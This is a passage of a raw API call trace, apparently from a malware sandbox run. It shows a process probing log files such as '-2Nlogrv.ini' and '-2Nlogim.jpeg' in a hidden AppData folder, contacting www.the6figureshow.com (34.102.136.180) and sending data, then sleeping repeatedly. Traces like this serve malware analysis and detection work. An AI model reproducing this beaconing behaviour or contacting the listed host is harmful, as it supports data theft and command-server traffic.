DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.397] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.397] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.397] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d2a0) returned 1 [0188.397] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.397] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.397] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.397] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0188.398] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.398] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.398] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.398] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0188.398] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.398] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.398] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.398] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0188.398] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.398] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.398] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0188.398] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0188.398] socket (af=2, type=1, protocol=6) returned 0x25d0 [0188.398] getaddrinfo (in: pNodeName="www.the6figureshow.com", pServiceName="80", pHints=0x8792a18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8792a48 | out: ppResult=0x8792a48*=0x4d6a060*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884860*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0188.460] connect (s=0x25d0, name=0x8884860*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0188.482] send (s=0x25d0, buf=0xa10808a*, len=166, flags=0) returned 166 [0188.482] setsockopt (s=0x25d0, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0188.482] recv (in: s=0x25d0, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 477 [0188.626] closesocket (s=0x25d0) returned 0 [0188.627] Sleep (dwMilliseconds=0x7d0) [0188.629] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.629] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.629] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0188.629] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d2a0) returned 1 [0188.629] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.629] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.629] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.629] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0188.629] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.629] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.629] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.629] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e260) returned 1 [0188.629] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.630] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.630] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.630] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e410) returned 1 [0188.630] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.630] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.630] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.630] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d3c0) returned 1 [0188.630] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.630] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.630] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.630] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0188.630] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.630] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.630] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.630] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0188.630] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.631] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.631] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.631] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e1d0) returned 1 [0188.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.631] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.631] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.631] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d840) returned 1 [0188.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.631] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.631] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.631] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e2f0) returned 1 [0188.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.631] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.631] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0188.631] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d3c0) returned 1 [0188.631] Sleep (dwMilliseconds=0x7d0) [0188.633] Sleep (dwMilliseconds=0x7d0) [0188.634] Sleep (dwMilliseconds=0x7d0) [0188.646] Sleep (dwMilliseconds=0x7d0) [0188.648] Sleep (dwMilliseconds=0x7d0) [0188.649] Sleep (dwMilliseconds=0x7d0) [0188.651] Sleep (dwMilliseconds=0x7d0) [0188.652] Sleep (dwMilliseconds=0x7d0) [0188.654] Sleep (dwMilliseconds=0x7d0) [0188.657] Sleep (dwMilliseconds=0x7d0) [0188.659] Sleep (dwMilliseconds=0x7d0) [0188.661] Sleep (dwMilliseconds=0x7d0) [0188.663] Sleep (dwMilliseconds=0x7d0) [0188.664] Sleep (dwMilliseconds=0x7d0) [0188.665] Sleep (dwMilliseconds=0x7d0) [0188.667] Sleep (dwMilliseconds=0x7d0) [0188.668] Sleep (dwMilliseconds=0x7d0) [0188.671] Sleep (dwMilliseconds=0x7d0) [0188.673] Sleep (dwMilliseconds=0x7d0) [0188.674] Sleep (dwMilliseconds=0x7d0) [0188.676] Sleep (dwMilliseconds=0x7d0) [0188.677] Sleep (dwMilliseconds=0x7d0) [0188.679] Sleep (dwMilliseconds=0x7d0) [0188.680] Sleep (dwMilliseconds=0x7d0) [0188.682] Sleep (dwMilliseconds=0x7d0) [0188.683] Sleep (dwMilliseconds=0x7d0) [0188.685] Sleep (dwMilliseconds=0x7d0) [0188.686] Sleep (dwMilliseconds=0x7d0) [0188.688] Sleep (dwMilliseconds=0x7d0) [0188.689] Sleep (dwMilliseconds=0x7d0) [0188.691] Sleep (dwMilliseconds=0x7d0) [0188.692] Sleep (dwMilliseconds=0x7d0) [0188.694] Sleep (dwMilliseconds=0x7d0) [0188.695] Sleep (dwMilliseconds=0x7d0) [0188.697] Sleep (dwMilliseconds=0x7d0) [0188.698] Sleep (dwMilliseconds=0x7d0) [0188.700] Sleep (dwMilliseconds=0x7d0) [0188.701] Sleep (dwMilliseconds=0x7d0) [0188.703] Sleep (dwMilliseconds=0x7d0) [0188.704] Sleep (dwMilliseconds=0x7d0) [0188.706] Sleep (dwMilliseconds=0x7d0) [0188.707] Sleep (dwMilliseconds=0x7d0) [0188.709] Sleep (dwMilliseconds=0x7d0) [0188.710] Sleep (dwMilliseconds=0x7d0) [0188.712] Sleep (dwMilliseconds=0x7d0) [0188.713] Sleep (dwMilliseconds=0x7d0) [0188.715] Sleep (dwMilliseconds=0x7d0) [0188.716] Sleep (dwMilliseconds=0x7d0) [0188.718] Sleep (dwMilliseconds=0x7d0) [0188.719] Sleep (dwMilliseconds=0x7d0) [0188.721] Sleep (dwMilliseconds=0x7d0) [0188.722] Sleep (dwMilliseconds=0x7d0) [0188.724] Sleep (dwMilliseconds=0x7d0) [0188.725] Sleep (dwMilliseconds=0x7d0) [0188.727] Sleep (dwMilliseconds=0x7d0) [0188.728] Sleep (dwMilliseconds=0x7d0) [0188.730] Sleep (dwMilliseconds=0x7d0) [0188.731] Sleep (dwMilliseconds=0x7d0) [0188.733] Sleep (dwMilliseconds=0x7d0) [0188.734] Sleep (dwMilliseconds=0x7d0) [0188.736] Sleep (dwMilliseconds=0x7d0) [0188.737] Sleep (dwMilliseconds=0x7d0) [0188.739] Sleep (dwMilliseconds=0x7d0) [0188.740] Sleep (dwMilliseconds=0x7d0) [0188.742] Sleep (dwMilliseconds=0x7d0) [0188.743] Sleep (dwMilliseconds=0x7d0) [0188.745] Sleep (dwMilliseconds=0x7d0) [0188.746] Sleep (dwMilliseconds=0x7d0) [0188.748] Sleep (dwMilliseconds=0x7d0) [0188.749] Sleep (dwMilliseconds=0x7d0) [0188.751] Sleep (dwMilliseconds=0x7d0) [0188.752] Sleep (dwMilliseconds=0x7d0) [0188.754] Sleep (dwMilliseconds=0x7d0) [0188.755] Sleep (dwMilliseconds=0x7d0) [0188.757] Sleep (dwMilliseconds=0x7d0) [0188.758] Sleep (dwMilliseconds=0x7d0) [0188.760] Sleep (dwMilliseconds=0x7d0) [0188.761] Sleep (dwMilliseconds=0x7d0) 